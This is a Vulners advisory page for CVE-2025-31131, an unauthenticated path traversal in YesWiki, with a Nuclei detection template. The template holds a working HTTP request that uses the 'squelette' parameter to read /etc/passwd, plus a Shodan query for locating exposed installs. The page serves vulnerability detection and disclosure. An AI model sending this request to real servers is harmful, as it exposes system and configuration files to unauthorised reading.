| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for Path Traversal in Yeswiki | 4 Apr 202515:31 | โ | githubexploit | |
| Exploit for Path Traversal in Yeswiki | 7 Jun 202509:18 | โ | githubexploit | |
| CVE-2025-31131 | 1 Apr 202516:32 | โ | circl | |
| YesWiki ่ทฏๅพ้ๅๆผๆด | 1 Apr 202500:00 | โ | cnnvd | |
| CVE-2025-31131 | 1 Apr 202514:56 | โ | cve | |
| CVE-2025-31131 Path Traversal allowing arbitrary read of files in Yeswiki | 1 Apr 202514:56 | โ | cvelist | |
| YesWiki 4.5.1 - Unauthenticated Path Traversal | 7 Apr 202500:00 | โ | exploitdb | |
| EUVD-2025-9333 | 3 Oct 202520:07 | โ | euvd | |
| Yeswiki Path Traversal vulnerability allows arbitrary read of files | 1 Apr 202518:31 | โ | github | |
| CVE-2025-31131 | 1 Apr 202515:16 | โ | nvd |
id: CVE-2025-31131
info:
name: Yeswiki < 4.5.2 - Unauthenticated Path Traversal
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
impact: |
Unauthenticated attackers can exploit path traversal through the squelette parameter to read arbitrary files from the YesWiki server, potentially exposing sensitive configuration and data files.
remediation: |
This vulnerability is fixed in 4.5.2.
reference:
- https://github.com/advisories/GHSA-w34w-fvp3-68xm
- https://github.com/YesWiki/yeswiki/commit/f78c915369a60c74ab8f38561ae93a4aaca9b989
- https://github.com/YesWiki/yeswiki/security/advisories/GHSA-w34w-fvp3-68xm
classification:
epss-score: 0.05366
epss-percentile: 0.91679
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2025-31131
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
shodan-query: html:"yeswiki"
tags: cve,cve2025,yeswiki,lfi,vuln
http:
- raw:
- |
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- YesWiki-main
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4a0a004730450221008096412a4e21c82e60821e9033aa59fe287b53b4de0f06455c7179fdd3af993902205fecb8ef799be80ab3f256262bd57ffd788e6a4b20603cb6d088ea683e2eb0ed:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation